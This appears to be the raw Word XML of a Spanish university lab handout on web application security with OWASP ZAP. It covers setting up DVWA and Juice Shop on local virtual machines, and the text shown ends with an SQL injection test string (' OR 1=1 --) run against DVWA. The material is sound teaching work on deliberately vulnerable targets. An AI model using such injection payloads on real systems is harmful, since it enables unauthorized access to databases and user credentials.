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2AE9" w14:textId="77777777" w:rsidR="00791801" w:rsidRPr="00CB63B1" w:rsidRDefault="00791801" w:rsidP="00CB63B1">
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526CFC98" w14:textId="77777777" w:rsidR="00791801" w:rsidRPr="00CB63B1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>Ingeniería de Seguridad del Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2325CA" w14:textId="2B835F1A" w:rsidR="00791801" w:rsidRPr="00CB63B1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B63B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t xml:space="preserve">Práctica de Laboratorio No. </w:t>
      </w:r>
      <w:r w:rsidR="002A3500">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB63B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>. Tercera Unidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D96AA" w14:textId="29A2852C" w:rsidR="00791801" w:rsidRPr="00CB63B1" w:rsidRDefault="00791801" w:rsidP="00BF7332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lang w:val="es-EC" w:eastAsia="es-EC"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB63B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>Tema:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB63B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A3500" w:rsidRPr="002A3500">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>Seguridad de Aplicaciones en Internet con OWASP ZAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB63B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-EC" w:eastAsia="es-EC"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA47447" w14:textId="5C856C73" w:rsidR="00DE6888" w:rsidRPr="00BF7332" w:rsidRDefault="00224558" w:rsidP="00BF7332">
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-EC"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB63B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Objetivos de Aprendizaje:</w:t>
      </w:r>
      <w:r w:rsidR="00BF7332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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE6888" w:rsidRPr="00BF7332">
        <w:rPr>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>Al finalizar esta práctica, el estudiante será capaz de:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260D95F2" w14:textId="77777777" w:rsidR="00DE6888" w:rsidRDefault="00DE6888" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Comprender los fundamentos de seguridad en aplicaciones web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723E29B2" w14:textId="77777777" w:rsidR="00DE6888" w:rsidRDefault="00DE6888" w:rsidP="00DE6888">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Usar OWASP ZAP para identificar y explotar vulnerabilidades en aplicaciones inseguras.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D28820" w14:textId="77777777" w:rsidR="00DE6888" w:rsidRDefault="00DE6888" w:rsidP="00DE6888">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Configurar entornos de pruebas con Ubuntu Server/Desktop y Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BD1436" w14:textId="3EB094B1" w:rsidR="00DE6888" w:rsidRDefault="00DE6888" w:rsidP="00DE6888">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detectar y explotar vulnerabilidades como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00AE18C2">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>inyección de código JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD1443" w14:textId="174527D0" w:rsidR="00DE6888" w:rsidRDefault="00DE6888" w:rsidP="00DE6888">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analizar riesgos como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>robo de cookies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mediante scripts maliciosos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBB9E90" w14:textId="7EF98904" w:rsidR="00DE6888" w:rsidRPr="00AE18C2" w:rsidRDefault="00AE18C2" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE6888" w:rsidRPr="00AE18C2">
        <w:t>Elaborar un reporte técnico con hallazgos y recomendaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B0D63" w14:textId="77777777" w:rsidR="002A3500" w:rsidRPr="00DE6888" w:rsidRDefault="002A3500" w:rsidP="00DE6888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E6888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Requisitos previos</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6888">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="es-EC" w:eastAsia="es-EC"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D58C6" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Conocimientos básicos de redes y aplicaciones web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E35430" w14:textId="059E5CB6" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Manejo básico de Kali Linux, Ubuntu y entornos virtuales (VirtualBox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D216803" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Conocimientos sobre OWASP y los ataques comunes de seguridad web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3E3530" w14:textId="14B9CE2A" w:rsidR="00BF7332" w:rsidRDefault="00BF7332" w:rsidP="00AE18C2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Topología de prueba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD9C76" w14:textId="77777777" w:rsidR="00BF7332" w:rsidRDefault="00BF7332" w:rsidP="00BF7332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Ubuntu Server</w:t>
      </w:r>
      <w:r>
        <w:t>: aloja DVWA y/o OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6854C7" w14:textId="77777777" w:rsidR="00BF7332" w:rsidRDefault="00BF7332" w:rsidP="00BF7332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Ubuntu Desktop o Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:t>: utilizado por los estudiantes para ejecutar OWASP ZAP y lanzar ataques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23891E27" w14:textId="77777777" w:rsidR="00BF7332" w:rsidRDefault="00BF7332" w:rsidP="00BF7332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Aplicaciones vulnerables</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E56790F" w14:textId="77777777" w:rsidR="00BF7332" w:rsidRPr="002A3500" w:rsidRDefault="00BF7332" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366F2BD0" w14:textId="77777777" w:rsidR="00BF7332" w:rsidRDefault="00BF7332" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F08B99" w14:textId="77777777" w:rsidR="00BF7332" w:rsidRDefault="00BF7332" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>scanme.nmap.org (solo escaneo pasivo con respeto a su política de uso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDAEB5D" w14:textId="231C42DF" w:rsidR="002A3500" w:rsidRPr="00AE18C2" w:rsidRDefault="002A3500" w:rsidP="00AE18C2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AE18C2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Marco Teórico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32842D6C" w14:textId="67DFCD7D" w:rsidR="002A3500" w:rsidRPr="00AE18C2" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-EC"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18C2">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>OWASP y las aplicaciones web inseguras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF4B86" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Open Web Application Security Project (OWASP)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> proporciona guías, herramientas y proyectos enfocados en la mejora de la seguridad de software. Entre sus recursos se encuentran herramientas como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>OWASP ZAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, así como aplicaciones intencionalmente vulnerables como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Juice Shop</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12910B81" w14:textId="79213832" w:rsidR="002A3500" w:rsidRPr="00AE18C2" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18C2">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>Principales vulnerabilidades web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617313B3" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Según el OWASP Top 10, las vulnerabilidades más comunes incluyen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7B0F1" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A350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A1: SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t>: Inyección de código SQL malicioso para manipular bases de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DBCB25" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332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A7: Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r>
        <w:t>: Inyección de scripts en sitios web para ejecutar en el navegador de otro usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D09C1" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A350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Inyección de código JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>: Manipulación del DOM para obtener acceso a cookies, sesiones o redirigir a páginas maliciosas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3C1D9B" w14:textId="508855BD" w:rsidR="002A3500" w:rsidRPr="00AE18C2" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-EC"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18C2">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C48C41C" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP ZAP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Zed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Proxy) es una herramienta open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para realizar pruebas de penetración en aplicaciones web. Permite el análisis pasivo, escaneo activo, y explotación de vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117F81D5" w14:textId="65067B09" w:rsidR="002A3500" w:rsidRPr="00DD1843" w:rsidRDefault="002A3500" w:rsidP="00DD1843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Desarrollo de la Práctica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D42ADC" w14:textId="6FFD31F5" w:rsidR="002A3500" w:rsidRPr="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:lang w:val="es-EC"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18C2">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>Parte 1: Configuración del entorno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D0E97" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Iniciar las máquinas virtuales:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA59A6F" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Ubuntu Server</w:t>
      </w:r>
      <w:r>
        <w:t>: donde esté instalado DVWA o Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12227D87" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Ubuntu Desktop/Kali</w:t>
      </w:r>
      <w:r>
        <w:t>: con OWASP ZAP preinstalado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5036586B" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Comprobar conectividad (ping entre VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEAD970" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>En Ubuntu Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA46BFC" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configurar DVWA: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> install apache2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>php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mariadb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF9BA1" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Clonar DVWA desde GitHub: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> clone https://github.com/digininja/DVWA.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E21CA03" w14:textId="5F727BD0" w:rsidR="002A3500" w:rsidRPr="00DD1843" w:rsidRDefault="002A3500" w:rsidP="00DD1843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Parte 2: Exploración con OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614FA63C" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abrir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>OWASP ZAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en Kali/Ubuntu Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A94122" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Configurar el navegador para que use OWASP ZAP como proxy (127.0.0.1:8080)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4334A06D" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Acceder a DVWA desde el navegador (por ejemplo, http://192.168.56.101/dvwa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FB3EBA" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Explorar los módulos mientras OWASP ZAP intercepta el tráfico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E055E31" w14:textId="4019079B" w:rsidR="002A3500" w:rsidRPr="00DD1843" w:rsidRDefault="002A3500" w:rsidP="00DD1843">
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val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Parte 3: Detección y explotación de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFB6B92" w14:textId="64483307" w:rsidR="002A3500" w:rsidRPr="00AE18C2" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE18C2">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5A9DEC" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En DVWA, ir a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7569576C" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Probar con: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654BD1A1" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analizar respuesta y datos extraídos (e.g., usuarios, contraseñas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B5F005" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Revisar la alerta generada por OWASP ZAP</w:t>
      </w:r>
    </w:p>
